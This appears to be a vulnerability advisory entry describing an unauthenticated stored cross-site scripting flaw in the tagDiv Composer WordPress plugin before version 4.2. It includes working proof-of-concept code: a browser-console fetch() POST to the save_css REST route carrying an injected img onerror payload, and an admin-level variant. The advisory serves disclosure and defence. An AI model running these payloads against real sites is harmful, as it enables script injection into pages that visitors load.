Lucene search

Truoc PhanWPEX-ID:E6D8216D-ACE4-48BA-AFCA-74DA0DC5ABB5

HistoryAug 17, 2023 - 12:00 a.m.

tagDiv Composer < 4.2 - Unauthenticated Stored XSS

2023-08-1700:00:00

Truoc Phan

205

tagdiv composer

unauthenticated

stored xss

newsmag

plugins

admin

browser console

wp admin

xss

6.2 Medium

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

30.2%

JSON

Description The plugin, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not have authorisation in a REST route and does not validate as well as escape some parameters when outputting them back, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks. Note: The issue was partially fixed in 4.1 (still exploitable by Admin+ as only authorisation was added) and fully fixed in 4.2

Before 4.1:

1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Run the following code in the browser console while logged out:

fetch( '/wp-json/tdw/save_css', {
    headers: {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    body: "compiled_css=%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%28%27XSS%2DChecker%27%29%3E%3Cstyle%3E",
    method: "POST",
} );


In version 4.1, exploitable by Admin:

1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Log in as an admin, and run the following code in a browser console within WP Admin:

await wp.apiRequest( { path: 'tdw/save_css', type: 'POST', data: { compiled_css: "</style><img src=x onerror=alert('XSS-Checker')><style>" } } );

3. Load a frontend page to see the XSS.